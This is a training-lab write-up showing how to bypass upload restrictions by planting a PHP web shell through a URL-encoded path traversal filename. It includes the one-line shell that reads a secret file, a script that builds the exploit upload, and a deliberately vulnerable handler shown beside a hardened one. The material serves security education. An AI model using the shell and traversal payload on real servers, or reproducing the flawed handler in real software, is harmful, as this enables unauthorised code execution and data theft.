Web shell upload via path traversal is a file upload vulnerability in which an attacker uploads a malicious shell and uses path traversal sequences in the filename to place it in a directory they are not authorized to write to. The attacker first identifies an upload function whose filename handling allows path traversal, then uses it to write the file outside the intended upload directory. This is our 3rd article about file upload vulnerabilities. Here is the stepwise roadmap for file upload vulnerabilities.
Today's lab contains an image upload function. The server is configured to prevent execution of user-supplied files in the directory they are uploaded to. However, we can bypass this restriction through a secondary vulnerability: path traversal in the uploaded filename.
To solve the lab, we need to upload a PHP web shell and use it to read the /home/carlos/secret file, then submit its contents as the solution. The default credentials are wiener:peter.
First, access the lab and log in using the default credentials. After logging in, enable your Burp Suite proxy, then upload a malicious file with a .php extension. I have named the malicious file "myexploit.php". In the screenshot above, two requests are highlighted. The first is a GET request that fetches the uploaded image from its stored location; the second is the POST request that uploads the myexploit.php file. I will send both of these requests to Repeater.
After sending the requests to Repeater, I renamed the POST-based upload request to "UploadImage" and the GET-based request that retrieves the image to "ShowImage".
The malicious file I uploaded, myexploit.php, contains a single line:
<?php echo file_get_contents('/home/carlos/secret'); ?>
The file was uploaded successfully, but when I request it through the browser I see a blank page instead of the secret. The server is returning the file as a static document rather than executing it, which indicates that PHP execution has been disabled for the upload directory.
Bypassing File Upload Restriction
Now we will bypass this restriction by uploading the shell into a directory where the restriction does not apply. To do this, we will use the traversal sequence ../ in the filename. We have to modify the same POST-based request that we used to upload myexploit.php, and simply prepend ../ to the filename.
As you can see in the screenshot, I have changed the filename to "../myexploit.php". But that is not enough: the server catches a literal ../ in the filename, and the file still lands in the avatars directory. We have to URL-encode the forward slash (/) so the check does not see the traversal sequence. The URL-encoded value of / is %2f, so I changed the filename to "..%2fmyexploit.php". The server decodes the filename after its check, so the ..%2f becomes ../ when the file is written and the shell is saved one directory up. Forward this request and go to ShowImage.
In the "ShowImage" tab, change GET /files/avatars/myexploit.php to GET /files/myexploit.php, removing the /avatars segment, because the traversal placed our PHP shell one directory up, in /files rather than /files/avatars.
As you can see, requesting the shell from the "files" directory, one level above avatars, works: the restriction only applies to the avatars directory, so the PHP executes here and the response contains the contents of /home/carlos/secret. I have obtained the key.
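The following added example (not code from the original write-up or from the lab itself) models the two halves of the bypass described above: the crafted multipart upload that Burp Repeater sends, and the server-side mistake that makes "..%2fmyexploit.php" escape the avatars directory while "../myexploit.php" does not. The web root, upload directory and form field name "avatar" are assumptions, since the write-up does not show them; the vulnerable handler is a reconstruction of the observed behaviour (strip a literal ../ from the filename, then URL-decode it), shown beside a hardened version that decodes first, keeps only the basename and verifies the final path. It also goes slightly beyond the page's case by checking the %2e%2e%2f variant.

```python
import posixpath
from urllib.parse import unquote

# Assumed layout: the lab server's web root and upload directory are not
# shown in the write-up, so these are placeholder paths for the example.
WEB_ROOT = "/var/www/html"
UPLOAD_DIR = posixpath.join(WEB_ROOT, "files", "avatars")

# The one-line web shell from the write-up.
PHP_SHELL = "<?php echo file_get_contents('/home/carlos/secret'); ?>"


def build_multipart_body(filename: str, content: str,
                         boundary: str = "----BurpBoundary") -> str:
    """Build the multipart/form-data body of the UploadImage request.

    The exploit only changes the filename parameter of the Content-Disposition
    header; the form field name 'avatar' is an assumption for this example.
    """
    return (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="avatar"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n"
        "\r\n"
        f"{content}\r\n"
        f"--{boundary}--\r\n"
    )


def vulnerable_save_path(filename: str) -> str:
    """Reconstruction of the flawed handling the lab exhibits (assumed model).

    Step 1 strips a literal '../' from the raw filename, so '../myexploit.php'
    becomes 'myexploit.php' and still lands in avatars/. Step 2 URL-decodes
    the name *after* that check, so '..%2fmyexploit.php' turns back into
    '../myexploit.php' and escapes the avatars directory when joined.
    """
    stripped = filename.replace("../", "")
    decoded = unquote(stripped)
    return posixpath.normpath(posixpath.join(UPLOAD_DIR, decoded))


def safe_save_path(filename: str) -> str:
    """Hardened version: decode first, keep only the basename, then verify
    that the resolved path is still inside UPLOAD_DIR."""
    decoded = unquote(filename)
    name = posixpath.basename(decoded)
    if name in ("", ".", ".."):
        raise ValueError("invalid filename")
    target = posixpath.normpath(posixpath.join(UPLOAD_DIR, name))
    # Belt-and-braces: basename already removed directories, but re-check.
    if posixpath.commonpath([UPLOAD_DIR, target]) != UPLOAD_DIR:
        raise ValueError("path escapes upload directory")
    return target


def url_for(saved_path: str) -> str:
    """Translate a saved file path into the request path for ShowImage."""
    return "/" + posixpath.relpath(saved_path, WEB_ROOT)


if __name__ == "__main__":
    for name in ("myexploit.php", "../myexploit.php", "..%2fmyexploit.php"):
        saved = vulnerable_save_path(name)
        print(f"{name!r:28} -> {saved}  (GET {url_for(saved)})")
    print(build_multipart_body("..%2fmyexploit.php", PHP_SHELL))
```

Running the script shows why the first two uploads stay in /files/avatars while the encoded one is written to /files, which is exactly the path you then request in the ShowImage tab. The hardened handler returns /files/avatars/myexploit.php for every variant; in a real application you would also restrict the extension, since keeping a .php file in a non-executing directory is only safe as long as that configuration holds.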
Congratulations, the lab was solved after I submitted the key.